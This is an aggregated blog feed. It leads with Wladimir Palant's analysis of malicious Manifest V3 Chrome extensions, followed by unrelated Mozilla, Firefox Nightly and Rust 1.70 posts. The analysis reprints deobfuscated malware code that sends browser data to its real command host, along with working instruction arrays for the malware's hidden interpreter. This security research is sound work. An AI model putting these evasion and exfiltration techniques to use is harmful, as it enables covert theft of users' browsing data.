Wladimir Palant: How malicious extensions hide running arbitrary code

Two days ago I wrote about the malicious extensions I discovered in Chrome Web Store. At some point this article got noticed by Avast. Once their team confirmed my findings, Google finally reacted and started removing these extensions. Out of the 34 extensions I reported, only 8 extensions remain. These eight were all part of an update where I added 16 extensions to my list, an update that came too late for Avast to notice.

Note: Even for the removed extensions, it isn’t “mission accomplished” yet. Yes, the extensions can no longer be installed. However, the existing installations remain. From what I can tell, Google hasn’t blocklisted these extensions yet.

Avast ran their own search, and they found a bunch of extensions that I didn’t see. So how come they missed eight extensions? The reason seems to be: these are considerably different. They migrated to Manifest V3, so they had to find new ways of running arbitrary code that wouldn’t attract unnecessary attention.

Update (2023-06-03): These extensions have been removed from the Chrome Web Store as well.

Which extensions is this about?

The malicious extensions currently still in Chrome Web Store are:

Name Weekly active users Extension ID
Soundboost 6,925,522 chmfnmjfghjpdamlofhlonnnnokkpbao
Amazing Dark Mode 2,228,049 fbjfihoienmhbjflbobnmimfijpngkpa
Awesome Auto Refresh 2,222,284 djmpbcihmblfdlkcfncodakgopmpgpgh
Volume Frenzy 1,626,760 idgncaddojiejegdmkofblgplkgmeipk
Leap Video Downloader 1,454,917 bjlcpoknpgaoaollojjdnbdojdclidkh
Qspeed Video Speed Controller 732,250 pcjmcnhpobkjnhajhhleejfmpeoahclc
HyperVolume 592,479 hinhmojdkodmficpockledafoeodokmc
Light picture-in-picture 172,931 gcnceeflimggoamelclcbhcdggcmnglm

Is it even the same malware?

I found this latest variant of the malicious code thanks to Lukas Andersson, who researched reputation manipulation in Chrome Web Store. He shared with me a list of extensions that manipulated reviews similarly to the extensions I had already discovered. Some of these extensions did in fact turn out to be malicious, with a bunch using malicious code that I hadn’t seen before.

But this isn’t evidence that all these extensions are in fact related. And the new variant even communicates with tryimv3srvsts[.]com instead of serasearchtop[.]com. So how can I be certain that it is the same malware?

However, the obfuscation approach gives it away: lots of unnecessary conditional statements, useless variables and strings being pieced together. It’s exactly what I already described for the PDF Toolbox extension. Also, there is the familiar mangled timestamp meant to prevent config downloads in the first 24 hours after installation. It merely moved: localStorage is no longer usable with Manifest V3, so the timestamp is now stored in storage.local.

The code once again masquerades as part of a legitimate library. This time, it has been added to the parser module of the Datejs library.

The “config” downloads

However, the approach to downloading the instructions changed considerably. I’ll use the Soundboost extension as my example, given that it is by far the most popular. When downloading the “config” file, Soundboost might also upload data. With obfuscation removed, the code looks roughly like this:

async function getConfig()
{
  let config = (await chrome.storage.local.get("<key>")).<key>;
  let options;
  if (config)
  {
    options = {
      method: "POST",
      body: JSON.stringify(config)
    };
  }
  else
  {
    config = {};
    options = {
      method: "GET"
    };
  }
  let response = await fetch(
    "https://tryimv3srvsts.com/chmfnmjfghjpdamlofhlonnnnokkpbao",
    options
  );
  let json = await response.json();
  Object.assign(config, json);
  if (config.l)
    chrome.storage.local.set({<key>: config});
  return config.l;
}

So the extension will retrieve the config from storage.local, send it to the server, merge it with the response and write it back to storage.local. But what’s the point of sending a config to the server that has been previously received from it?

I can see only one answer: by the time the config is sent to the server, additional data will be added to it. So this is a data collection and exfiltration mechanism: the instructions in config.l, when executed by the extension, will collect data and store it in the storage.local entry. And next time the extension starts up this data will be sent to the server.

This impression is further reinforced by the fact that the extension will reload itself every 12 hours. This makes sure that accumulated data will always be sent out after this time period, even if the user never closes their browser.

Executing the instructions

Previously, Chrome extensions could always run arbitrary JavaScript code as content scripts. As this is a major source of security vulnerabilities, Manifest V3 disallowed that. Now running dynamic code is only possible by relaxing default Content Security Policy restrictions. But that would raise suspicions, so malicious extensions would like to avoid it of course.

With sufficient determination, such restrictions can always be worked around however. For example, the Honey extension chose to ship an entire JavaScript interpreter with it. This allowed it to download and run JavaScript code without it being subject to the browser’s security mechanisms. The company was apparently so successful extracting data in this way that PayPal bought it for $4 billion.

A JavaScript interpreter is lots of code however. There are indications that the malicious code in Soundboost is being obfuscated manually, something that doesn’t work with large code quantities. So the instruction processing in Soundboost is a much smaller interpreter, one that supports only 8 possible actions. This minimalistic approach is sufficient to do considerable damage.

The interpreter works on arrays representing expressions, with the first array element indicating the type of the expression and the rest of them being used as parameters. Typically, these parameters will themselves be recursively resolved as expressions. Non-array expressions are left unchanged.
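Based on that description, a minimal interpreter along these lines might look as follows. This is my own sketch, not the extension’s actual code: the real interpreter supports eight action types and certainly differs in its details.

```javascript
function evaluate(expr, args = [])
{
  // Non-array expressions are left unchanged (verbatim values)
  if (!Array.isArray(expr))
    return expr;

  let [type, ...params] = expr;
  switch (type)
  {
    // Property access: [".", objectExpr, propertyName]
    case ".":
      return evaluate(params[0], args)[params[1]];
    // Function call: ["@", funcExpr, ...parameterExprs]
    // Note: the function is called without a this value
    case "@":
      return evaluate(params[0], args)(
        ...params.slice(1).map(param => evaluate(param, args)));
    // Closure creation: ["^", bodyExpr]
    case "^":
      return (...callArgs) => evaluate(params[0], callArgs);
    // The arguments received by the enclosing closure: ["#"]
    case "#":
      return args;
    // Anything else is treated as a global name, e.g. ["console"]
    default:
      return globalThis[type];
  }
}
```

With this sketch, `evaluate(["@", [".", ["console"], "log"], "hi"])` resolves console from the global scope, looks up its log property and calls it with the verbatim parameter "hi".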

I tried out a bunch of instructions just to see that this approach is sufficient to abuse just about any extension privileges. The following instructions will print a message to console:

[
  // Call console.log
  "@", [".", ["console"], "log"],
  // Verbatim call parameter
  "hi"
]

The following calls chrome.tabs.update() to redirect the current browser tab to another page:

[
  // Call chrome.tabs.update
  "@", [".", [".", ["chrome"], "tabs"], "update"],
  // Verbatim call parameter
  {url: "https://example.com/"}
]

The malicious code also likely wants to add a tabs.onUpdated listener. This turned out to be more complicated. Not because of the need to create a callback; the interpreter has you covered there with the "^" expressions. However, function calls performed with this interpreter won’t pass in a this argument, and the addListener method doesn’t like that.

There might be multiple ways to work around this issue, but the one I found was calling via Reflect.apply and passing in a this argument explicitly. This also requires calling the Array constructor to create an array:

[
  // Call Reflect.apply
  "@", [".", ["Reflect"], "apply"],
  // target parameter: chrome.tabs.onUpdated.addListener
  [".", [".", [".", ["chrome"], "tabs"], "onUpdated"], "addListener"],
  // thisArgument parameter: chrome.tabs.onUpdated
  [".", [".", ["chrome"], "tabs"], "onUpdated"],
  // argumentsList parameter
  [
    // Call Array constructor
    "@", ["Array"],
    // Array element parameter
    [
      // Create closure
      "^",
      [
        // Call console.log
        "@", [".", ["console"], "log"],
        // Pass in function arguments received by the closure
        ["#"]
      ]
    ]
  ]
]

These instructions successfully log any tab change reported to the onUpdated listener.
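The underlying this issue can be reproduced in plain JavaScript with a hypothetical event emitter standing in for chrome.tabs.onUpdated (my own illustration, not code from the extension):

```javascript
"use strict";

// Hypothetical stand-in for chrome.tabs.onUpdated: like the real API,
// addListener relies on its this value.
const emitter = {
  listeners: [],
  addListener(listener)
  {
    this.listeners.push(listener);
  }
};

// The interpreter resolves functions detached from their object, so a
// direct call would run with this === undefined and throw a TypeError:
const detached = emitter.addListener;
// detached(() => {});   // TypeError: this.listeners is unreachable

// Reflect.apply supplies the receiver explicitly, which is exactly what
// the instructions above arrange for:
Reflect.apply(detached, emitter, [args => console.log(args)]);
```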

So this isn’t the most comfortable language to use, and it lacks flow control constructs other than try .. catch. Yet with some tricks it can do pretty much anything: try .. catch is already sufficient to construct simple if blocks, triggering an exception to execute the else part, and it should even be possible to emulate loops via recursive calls.
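As a plain-JavaScript illustration (my own sketch, not the expression language itself) of how try .. catch alone can emulate an if/else: make the condition throw when it is absent, so that the catch block serves as the else branch.

```javascript
// Branching with nothing but try..catch: a method call on the condition
// throws for null/undefined, diverting control to the "else" code in
// the catch block.
function choose(condition, thenValue, elseValue)
{
  try
  {
    // Throws a TypeError if condition is null or undefined
    condition.valueOf();
    return thenValue;
  }
  catch (e)
  {
    return elseValue;
  }
}

choose({}, "then", "else");   // "then"
choose(null, "then", "else"); // "else"
```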

What is this being used for?

As with the other extensions, I haven’t actually seen the instructions that the extensions receive from their server. So I cannot know for certain what they do when activated. Reviews of older extensions report them redirecting Google searches to Bing, which is definitely something these newer extensions could do as well.

As mentioned above however, the newer extensions clearly transmit data to their server. What kind of data? All of them have access to all websites, so it would be logical if they collected full browsing profiles. The older extensions likely did as well, but this isn’t something that users would easily notice.

Quite remarkably, all the extensions also have the scripting permission which is unlikely to be a coincidence. This permission allows the use of the scripting.executeScript API, meaning running JavaScript code in the context of any website loaded in the browser. The catch however is: this API won’t run arbitrary code, only code that is already part of the extension.

I’m not entirely certain what trick the extensions pull to work around this limitation, but they’ve certainly thought of something. Most likely, their trick involves loading background.js into pages: while this file is supposed to run as the extension’s background worker, it is part of the extension, so the scripting.executeScript API will allow using it. One indirect confirmation is that the obfuscated code in background.js registers a listener for the message event, despite the fact that nothing should be able to send such messages as long as the script runs as a background worker.

The Mozilla Blog: Advancing the future of the internet with the ‘Photoshop of software’

A head shot of Jeff Lindsay atop an illustration of cubes. Jeff Lindsay is working to build the Photoshop of software at his company Progrium.

More than ever, we need a movement to ensure the internet remains a force for good. The Mozilla Internet Ecosystem (MIECO) program fuels this movement by supporting people who are looking to advance a more human-centered internet. With MIECO, Mozilla is looking to foster a new era of internet innovation that moves away from “fast and breaking things” and into a more purposeful, collaborative effort that includes voices and perspectives from many different companies and organizations.

This week we’re highlighting Jeff Lindsay, a self-proclaimed “rogue software engineer” who’s working to build the Photoshop of software at his company Progrium.


Jeff Lindsay has been shaking things up in Silicon Valley for the last two decades. 

In the 2000s, he helped start SuperHappyDevHouse, a series of large parties for laptop-toting hackers to “work on whatever they feel like working on,” as his co-founder David Weekly once described it.

Jeff went on to develop a reputation for his ability to build things quickly while freelancing across the Bay Area. While working at a NASA research center in Mountain View, he was involved in developing OpenStack, an open source version of Amazon’s cloud service. Jeff also helped design and prototype the software Docker, which has become a billion-dollar company that creates productivity tools. He coined and pioneered webhooks, a standard way to create app integrations and plugins. Over the years, developers widely adopted his open source tools and libraries.

Now, in collaboration with MIECO, Jeff is working on Tractor System, a tool that lets users build software in a way that’s similar to creating and editing in Photoshop. His company, Progrium, is on a mission to empower the next generation of makers by providing tools and resources to reduce the complexity of computing through generative building blocks.

Jeff wants to make it easier for people to make software for themselves so that they’re less dependent on vendors who make software for companies and their needs. As the landscape of software development continues to evolve at a rapid pace, Jeff’s work aims to bridge the gap between using software, and creating it.

Tractor System is about building software that works for people, not corporations, Jeff said. 

“Photoshop gives you the tools to do image manipulation yourself,” he explained. “So if I can build something that gives you enough tools to assemble and interact with software systems in a very general sense, then it opens up a whole lot more possibilities.”

He compared using Tractor System to having pre-assembled Lego kits. “You just take these pieces, and you put them together in new and novel ways,” he said. “Then you can take [the structure] apart and remix it with another kit.”

Jeff said the idea was inspired by game development, where designers can configure and make custom components using the game engine Unity. In a sense, Tractor System takes him back to how he got started as a programmer in the first place: finding a Commodore 64 at a flea market and then learning how to make games from programming books at his local library.

“I love anything that gives programmers more superpowers,” Jeff said. “And I love anything that then makes programming more accessible, because then regular people get those superpowers.”

The post Advancing the future of the internet with the ‘Photoshop of software’ appeared first on The Mozilla Blog.

Firefox Nightly: Firefox Translations and Other Innovations – These Weeks in Firefox: Issue 139

Highlights

  • New in Nightly – Firefox Translations! Firefox can now often detect when you’re viewing a page written in a language that doesn’t match your locale, and for some languages it will offer to translate the page for you.
    • A panel opened from the Firefox Desktop URL bar asking if the user wants to translate the current page. The panel offers to translate the page from German to English.

      Ja, bitte! (“Yes, please!”)

    • This happens entirely client-side, meaning that neither the URL of the page nor any of the page data ever leaves your computer. The trade-off is the need to download “translation engines”, which can be done at translation time, or you can manage them yourself in about:preferences:
      • A section of the Firefox Preferences interface is shown with the title "Translations". The section offers to download languages for offline translation. A button is presented to download all languages, and then a series of individual languages are offered: Bulgarian, Catalan, Czech and Dutch are listed before the list goes outside of the screenshotted region.

        Qui è dove è possibile gestire i motori di lingua scaricati. (“This is where you can manage the downloaded language engines.”)

    • This is the direct successor to the venerable Firefox Translations add-on and builds on the research done with that project.
    • Bonus capability: visit about:translations to translate your own text as well
    • This is ready for Nightly testing. Found a bug? You can file a new one blocking this metabug.
  • New support for Picture-in-Picture captions – thanks to janvi for the patches.
  • Hubert enabled the Firefox Devtools debugger feature to ignore specific lines while debugging, as opposed to ignoring just files (bug)
    • The Debugger in the Firefox Devtools is shown with a context menu opened over a particular line in some JavaScript source code. The bottom entry in the menu is highlighted, and reads "Unignore line".

      Ignoring and unignoring lines makes it easier to step through the code you actually care about debugging!

  • Nicolas enabled the CSS compatibility tooltip feature on Nightly! (bug)
    • The Rules pane of the Firefox DevTools Inspector panel is shown, with several rules struck out, including "-webkit-text-size-adjust: 100%;". A lightbulb icon appears to the right of that rule with a tooltip explaining that "-webkit-text-size-adjust is an experimental property. It is not supported in the following browsers:", followed by a list of browser icons and version numbers.

      This should make it easier for web developers to ensure that their styles will work the way they expect them to for all browsers.

 

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug
  • Gregory Pappas [:gregp]
  • Janvi Bajoria [:janvi01]
  • Magnus Melin [:mkmelin]
New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • As part of the Colorways migration: in Firefox >= 115, we are allowing Colorways built-in themes to be auto-updated to the corresponding non-built-in Colorway themes hosted on addons.mozilla.org, for users not yet migrated because of the extensions.update.autoUpdateDefault pref being set to false (Bug 1830337)
WebExtensions Framework
  • Thanks to Eemeli, the localized strings related to the extension permissions have been migrated to Fluent (Bug 1793557, Bug 1632091)
  • Thanks to :ochameau and :peterv for their work to introduce the nsIConsoleService.callFunctionAndLogException helper in Bug 1810582
    • This new helper is going to be used in a separate followup, Bug 1810582, to make sure we include a full error stack trace when logging the exceptions raised from extension callbacks executed in response to the WebExtensions API events being emitted.
  • Thanks to Kris’ work in Bug 1769763, string labels (anonymized and non-anonymized) can now be associated with StructuredCloneHolder instances (which is going to be very helpful for determining what StructuredCloneHolder instances belong to in about:memory reports)
  • Thanks to Shane Hughes for reporting and fixing a slightly annoying glitch in the extensions panel (Bug 1810509)
  • Thanks to Gregory Pappas for contributing a nice cleanup of the downloads API internals (Bug 1834338)
WebExtension APIs
  • As part of the browser_style deprecation (started in Firefox 114), in Firefox 115 options_ui.browser_style and sidebar_action.browser_style will default to false for all Manifest Version 3 extensions (Bug 1830710).
  • Thanks to Gregory Pappas for contributing the changes needed to introduce a new browser.commands.onChanged WebExtensions API event, which will allow extensions to be notified when a user changes a shortcut associated with the extension’s commands in about:addons (Bug 1801531)
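For illustration, here is what an affected manifest entry could look like (hypothetical extension name and file name): in a Manifest Version 3 extension on Firefox 115, omitting browser_style is now equivalent to the explicit false below.

```json
{
  "manifest_version": 3,
  "name": "Example extension",
  "version": "1.0",
  "options_ui": {
    "page": "options.html",
    "browser_style": false
  }
}
```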

Developer Tools

DevTools
  • Contributors
    • Martín González Gómez extracted the highlighter code used to render the viewport size to a dedicated module. This will make it possible to automatically display this information on resize in a follow-up (bug)
    • Sebo added support for custom formatters in the debugger tooltip (bug)
  • Other teams
    • Arai fixed several issues around eager evaluation in the console (bug and bug)
  • Hubert added support for hiding sources based on the source map x_google_ignoreList field (bug)
    • The Firefox Debugger panel is shown with the tool's settings panel opened over top. The last item in that settings panel is highlighted and reads "Ignore Known Third-party Scripts".

      More tools to help you focus on the scripts that you actually care to debug!

    • A script titled "original-3.js" from the site "sourcemap-ignore-list.glitch.me" is shown. The source code is displayed, but the syntax highlighting is disabled, as the source is all being ignored for debugging.
  • Hubert added an option to hide ignored (blackboxed) sources (Bug 1824703)
    • The Firefox Debugger panel is shown with the tool's settings panel opened over top. The second-last item in that settings panel is checked and highlighted and reads "Hide Ignored Sources"

      This can also help reduce visual clutter in the debugger.

    • The source list in the Firefox Debugger is shown, listing various scripts loaded on the page. At the bottom of the source list is a message that says: "Ignored sources are hidden", followed by a button to "Show all sources".
  • Hubert also fixed a bug where adding a breakpoint would automatically unignore a source (bug)
  • Nicolas updated the links in our compatibility panel to be more explicit and added an MDN icon for links to MDN (bug)
    • The Compatibility pane from the Firefox Inspector Panel is shown. A list of rules is shown, including "scrollbar-color" and "font-smooth". Each rule is a link, followed by an icon representing MDN.
  • Nicolas also fixed more performance issues with the CSS compatibility tooltip (bug)
  • Alex fixed a bug where the icons in the debugger would randomly flicker when selecting a source (bug)
  • Alex addressed a performance regression on the Debugger (bug)
WebDriver BiDi
  • Contributors
    • Victoria Ajala fixed a bug to use the Timer module instead of window.setTimeout in various Remote Protocol modules (bug)
  • Other teams
    • Dan Robertson fixed the actions code to properly end wheel transactions, which allows us to stop disabling dom.event.wheel-event-groups.enabled for our users (bug)
  • Henrik removed the experimental flag from the input.performActions and input.releaseActions commands, which means they are now available to all WebDriver BiDi users (bug)
  • Julian fixed a bug where we would raise the incorrect exception when using a non-element Node as the origin of an action (bug)

Fluent

  • Eemeli continues to burn down our .properties strings. We’re down to 4200 .properties strings (we had ~4400 at the start of this month)
    • A graph from arewefluentyet.com is shown, showing the proportion of strings in the mozilla-central repository that are of the Fluent type, and of the .properties type. The x-axis is the date, and the y-axis is the count of strings by type. May 28th is the date selected in the graph, and a tooltip appears showing 6990 Fluent strings and 4200 .properties strings in the code on that date.

ESMification status

  • ESMified status:
    • browser: 71%
    • toolkit: 88%
    • Total:  85.3% (up from 81.6%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

Migration Improvements

  • hjones and mconley have been working on a mechanism to help people migrate off of old devices to new devices
    • There’s a Help menu item, starting in Firefox 114, “Switching to a new device”, which sends the user to this SUMO page.
    • We’ve built a “setup assistant” to walk the user through creating a Firefox Account and setting up sync. Finally, the user is presented with a URL to download a version of Firefox that, after install, is configured to first present the user with a Firefox Account login prompt during onboarding (for Firefox 114+).
    • We hope this will help people easily and securely move their data from old computers to newer ones.
  • Thanks to tgiles and mstriemer, we’ve got patches up to add support for importing history from Safari and importing bookmarks from HTML files (and JSON files)!
    • Special thanks to Evan Liang from CalState LA for getting us started on the Safari patch
  • mconley landed a patch to get payment method import working for Chrome-based browsers
    • Special thanks to Zach Harris from CalState LA for getting us started on that patch
  • mconley fixed a performance issue with importing form history entries from Chrome-based browsers

Picture-in-Picture

Search and Navigation

  • Daisuke has been working on an experiment to test Addon suggestions in the urlbar – see bugs 1833750, 1833760, 1833966
  • Drew has switched the result menu in the urlbar to use native context menu on mac – see bug 1831760
  • Mark updated the Gule sider search engine url – see bug 1834066
  • James and Stephanie have worked on various new recordings and bug fixes to search telemetry – see bugs 1816733, 1816738, 1823683, 1833245
  • Daisuke fixed pasted strings being overwritten – see bug 1834218

The Mozilla Blog: Mozilla Ventures Invests in Fiddler, Fueling Better AI Trust

The investment will help Fiddler scale its AI Observability Platform 

(PALO ALTO, CA | JUNE 1, 2023) – Today, Mozilla Ventures is announcing an investment in Fiddler, the Silicon Valley-based company that helps enterprises build trust into AI with monitoring, explainability, analytics, fairness, and safety. 

The Fiddler AI Observability Platform gives companies more visibility into their predictive and generative AI models. Fiddler’s platform helps stakeholders understand why predictions are made and what improvements are necessary for better outcomes — ultimately creating more trustworthy AI systems.

Fiddler brings increased transparency and actionable insights to the AI field at a vital moment. Generative AI models and applications are quickly being folded into consumer products and impacting billions of people — but sometimes these systems are biased and opaque, even to the engineers who build them.

Mozilla Ventures is a first-of-its-kind impact venture fund to invest in startups that push the internet — and the tech industry — in a better direction. The fund’s mission is largely modeled on Mozilla’s “Creating Trustworthy AI” whitepaper. 

Mozilla Ventures isn’t publicizing its investment amount at this time. Fiddler has previously received investment from Insight Partners, Lightspeed Venture Partners, Lux Capital, Alteryx Ventures, Haystack Ventures, Bloomberg Beta, and The Alexa Fund, among other investors.

This funding will help Fiddler bring its Responsible AI by Design approach to influential customers, a list which already includes some noteworthy organizations. Core to Fiddler’s Responsible AI by Design approach is the question: “How might an AI model adversely affect humans?”

Fiddler defines responsible AI as a series of best practices to ensure that LLM and MLOps-based systems deliver on their intent while mitigating unintended or harmful consequences. The platform enables responsible AI through monitoring and out-of-the-box AI explainability and relies on the principles of fairness, transparency, privacy, reliability, and accountability.

Fiddler also participated in Mozilla’s Responsible AI Challenge event on May 31, which convenes some of the brightest AI thinkers, technologists, ethicists and business leaders.

Says Krishna Gade, Founder and CEO of Fiddler: “We started Fiddler because there’s a need not just for more AI Observability in the industry, but also a framework that prioritizes societal good. Mozilla’s investment helps fuel our mission to make trustworthy, transparent, and understandable AI the status quo.”

Says Mohamed Nanabhay, Managing Partner of Mozilla Ventures: “Fiddler and Mozilla Ventures have a shared vision of AI — one that prioritizes fairness and explainability. In Fiddler’s role supporting a wide-range of AI companies, they can have an outsized influence on the ecosystem.”

Fiddler will join a cohort of other mission driven startups that Mozilla Ventures has invested in, including SAIL, heylogin, Lelapa AI, Themis AI, Block Party, and Rodeo. Mozilla Ventures launched in 2022 with an initial $35 million in funding.

Press contact: Kevin Zawacki | kevin@mozillafoundation.org 

###

The post Mozilla Ventures Invests in Fiddler, Fueling Better AI Trust appeared first on The Mozilla Blog.

The Mozilla Blog: Announcing Mozilla’s ‘Responsible AI Challenge’ top prize winners

When we relaunched the Mozilla Builders program last March, we unveiled our Responsible AI Challenge — a one-day, in-person event designed to inspire and encourage a community of builders working on trustworthy AI products and solutions — essentially a call to builders and technologists all over the world to create trustworthy AI solutions.

We are delighted to announce the prize winners of our Responsible AI Challenge, who demonstrated their ingenuity, innovation, and proficiency in developing human-centered and trustworthy AI applications and solutions.

A community of Builders

After weeks of reviewing hundreds of competitive consumer technology and generative AI projects, this challenge brought together builders and entrepreneurs from around the world, each vying to build better products and more responsible companies, despite the fact that it’s often the path of most resistance. After careful deliberation by our panel of judges – select individuals including AI academics, developers and entrepreneurs – we are proud to present the top prize winners amongst a community of Builders working on Trustworthy AI products and solutions.

Projects pictured from left to right: Nolano, Sanative AI and Kwanele Chat Bot.

Top Prize Winner [$50,000]: Sanative AI provides anti-AI watermarks to protect images and artwork from being used as training data for diffusion models.

2nd Prize Winner [$30,000]: Kwanele Chat Bot aims to empower women in communities plagued by violence by enabling them to access help fast and ensure the collection of admissible evidence.

3rd Prize Winner [$20,000]: Nolano is a trained language model that uses natural language processing to run on laptops and smartphones.

Build-by-Build: Standing on the shoulders of giants

Imo Udom introduces the keynote speakers to the stage.

“We’re existing in a unique and consequential time that is drawing huge emphasis on AI and catalyzing a movement towards more responsible development (something Mozilla is best known for) and it’s critical we act accordingly and influence where we can.”

Imo Udom, Senior Vice President of Innovation Ecosystems at Mozilla

The Responsible AI Challenge featured builders at various stages of their entrepreneurial and Trustworthy AI journeys: some were very early on and had never built a product before, others were seasoned entrepreneurs who were unfamiliar with Trustworthy AI, and still others were seasoned entrepreneurs who are already developing AI responsibly.

“Mozilla’s goal was for the judging process to be motivational for all candidates, inspiring them to continue developing responsible AI solutions in the future, even if they did not win,” says Britney Crooks, Director, Innovation and Product Strategy at Mozilla. “We asked that the judges raise key issues and considerations, while focusing on practical suggestions or alternative approaches for the applicants to address these issues.”

Mozillians take part in a reception post-ceremony.

In addition to cash prizes, the top three Responsible AI Challenge winners will receive ongoing access to mentorship from leaders in the industry and to Mozilla’s resources and communities, as they continue to develop, refine and deliver their responsible AI projects.

We will be publishing more in-depth features on the upcoming projects on the Mozilla Hacks blog.

The post Announcing Mozilla’s ‘Responsible AI Challenge’ top prize winners appeared first on The Mozilla Blog.

The Rust Programming Language Blog: Announcing Rust 1.70.0

The Rust team is happy to announce a new version of Rust, 1.70.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.70.0 with:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.70.0 on GitHub.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.70.0 stable

Sparse by default for crates.io

Cargo's "sparse" protocol is now enabled by default for reading the index from crates.io. This feature was previously stabilized with Rust 1.68.0, but still required configuration to use that with crates.io. The announced plan was to make that the default in 1.70.0, and here it is!

You should see substantially improved performance when fetching information from the crates.io index. Users behind a restrictive firewall will need to ensure that access to https://index.crates.io is available. If for some reason you need to stay with the previous default of using the git index hosted by GitHub, the registries.crates-io.protocol config setting can be used to change the default.
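As a sketch of that opt-out, the setting would go in a Cargo configuration file such as `.cargo/config.toml` (the section and key names are from the Cargo configuration documentation):

```toml
# .cargo/config.toml — opt back out of the new sparse default
[registries.crates-io]
protocol = "git"   # 1.70.0 defaults to "sparse"
```

Removing the setting (or setting it to "sparse") restores the new default.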

One side-effect to note about changing the access method is that this also changes the path to the crate cache, so dependencies will be downloaded anew. Once you have fully committed to using the sparse protocol, you may want to clear out the old $CARGO_HOME/registry/*/github.com-* paths.

OnceCell and OnceLock

Two new types have been stabilized for one-time initialization of shared data, OnceCell and its thread-safe counterpart OnceLock. These can be used anywhere that immediate construction is not wanted, and perhaps not even possible, such as for non-const data in global variables.

use std::sync::OnceLock;

static WINNER: OnceLock<&str> = OnceLock::new();

fn main() {
    let winner = std::thread::scope(|s| {
        s.spawn(|| WINNER.set("thread"));

        std::thread::yield_now(); // give them a chance...

        WINNER.get_or_init(|| "main")
    });

    println!("{winner} wins!");
}

Crates such as lazy_static and once_cell have filled this need in the past, but now these building blocks are part of the standard library, ported from once_cell's unsync and sync modules. There are still more methods that may be stabilized in the future, as well as companion LazyCell and LazyLock types that store their initializing function, but this first step in stabilization should already cover many use cases.
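For completeness, here is a minimal sketch of the single-threaded counterpart, OnceCell in std::cell, which offers the same one-time initialization without any synchronization overhead:

```rust
use std::cell::OnceCell;

fn main() {
    let cell: OnceCell<String> = OnceCell::new();
    assert!(cell.get().is_none()); // nothing stored yet

    // The closure runs only on the first call...
    let value = cell.get_or_init(|| "computed once".to_string());
    assert_eq!(value, "computed once");

    // ...later initializers are ignored; the first value wins.
    let value = cell.get_or_init(|| "never used".to_string());
    assert_eq!(value, "computed once");
}
```

Unlike OnceLock, OnceCell is not Sync, so it suits per-instance or thread-local lazy values rather than statics shared across threads.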

IsTerminal

This newly-stabilized trait has a single method, is_terminal, to determine if a given file descriptor or handle represents a terminal or TTY. This is another case of standardizing functionality that existed in external crates, like atty and is-terminal, using the C library isatty function on Unix targets and similar functionality elsewhere. A common use case is for programs to distinguish between running in scripts or interactive modes, like presenting colors or even a full TUI when interactive.

use std::io::{stdout, IsTerminal};

fn main() {
    let use_color = stdout().is_terminal();
    // if so, add color codes to program output...
}

Named levels of debug information

The -Cdebuginfo compiler option has previously only supported numbers 0..=2 for increasing amounts of debugging information, where Cargo defaults to 2 in dev and test profiles and 0 in release and bench profiles. These debug levels can now be set by name: "none" (0), "limited" (1), and "full" (2), as well as two new levels, "line-directives-only" and "line-tables-only".

The Cargo and rustc documentation both called level 1 "line tables only" before, but it was more than that with information about all functions, just not types and variables. That level is now called "limited", and the new "line-tables-only" level is further reduced to the minimum needed for backtraces with filenames and line numbers. This may eventually become the level used for -Cdebuginfo=1. The other line-directives-only level is intended for NVPTX profiling, and is otherwise not recommended.

Note that these named options are not yet available to be used via Cargo.toml. Support for that will arrive in the next release, 1.71.
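Until then, the named levels can be passed to rustc directly or via RUSTFLAGS; as a sketch (the file name here is hypothetical):

```
rustc -C debuginfo=line-tables-only main.rs

# or for a whole Cargo build, until Cargo.toml accepts the names in 1.71:
RUSTFLAGS="-C debuginfo=limited" cargo build
```

The numeric forms (0, 1, 2) continue to work and map to "none", "limited", and "full" respectively.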

Enforced stability in the test CLI

When #[test] functions are compiled, the executable gets a command-line interface from the test crate. This CLI has a number of options, including some that are not yet stabilized and require specifying -Zunstable-options as well, like many other commands in the Rust toolchain. However, while that's only intended to be allowed in nightly builds, that restriction wasn't active in test -- until now. Starting with 1.70.0, stable and beta builds of Rust will no longer allow unstable test options, making them truly nightly-only as documented.

There are known cases where unstable options may have been used without direct user knowledge, especially --format json used in IntelliJ Rust and other IDE plugins. Those projects are already adjusting to this change, and the status of JSON output can be followed in its tracking issue.

Stabilized APIs

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.70.0

Many people came together to create Rust 1.70.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantMore malicious extensions in Chrome Web Store

Two weeks ago I wrote about the PDF Toolbox extension containing obfuscated malicious code. Despite reporting the issue to Google via two different channels, the extension remains online. It even gained a considerable number of users after I published my article.

A reader tipped me off however that the Zoom Plus extension also makes a request to serasearchtop[.]com. I checked it out and found two other versions of the same malicious code. And I found more extensions in Chrome Web Store which are using it.

So now we are at 18 malicious extensions with a combined user count of 55 million. The most popular of these extensions are Autoskip for Youtube, Crystal Ad block and Brisk VPN: nine, six and five million users respectively.

Update (2023-06-01): With an increased sample I was able to find some more extensions. Also, Lukas Andersson did some research into manipulated extension ratings in Chrome Web Store and pointed out that other extensions exhibited similar patterns in their review. With his help I was able to identify yet another variant of this malicious code and a bunch more malicious extensions. So now we are at 34 malicious extensions and 87 million users.

Update (2023-06-01): Good news: Google started removing these extensions. By the time I published my previous update, a bunch of the extensions mentioned there were already gone. Right now, only nine extensions from this list remain in Chrome Web Store, and these will hopefully also be dealt with soon.

Update (2023-06-02): Google removed one more extension, so only eight extensions remain now. These eight extensions are considerably different from the rest, so I published a follow-up blog post discussing the technical aspects here.

The extensions

So far I could identify the following 34 malicious extensions. Most of them are listed as “Featured” in Chrome Web Store. User counts reflect the state for 2023-05-30.

Name Weekly active users Extension ID
Autoskip for Youtube 9,008,298 lgjdgmdbfhobkdbcjnpnlmhnplnidkkp
Soundboost 6,925,522 chmfnmjfghjpdamlofhlonnnnokkpbao
Crystal Ad block 6,869,278 lklmhefoneonjalpjcnhaidnodopinib
Brisk VPN 5,595,420 ciifcakemmcbbdpmljdohdmbodagmela
Clipboard Helper 3,499,233 meljmedplehjlnnaempfdoecookjenph
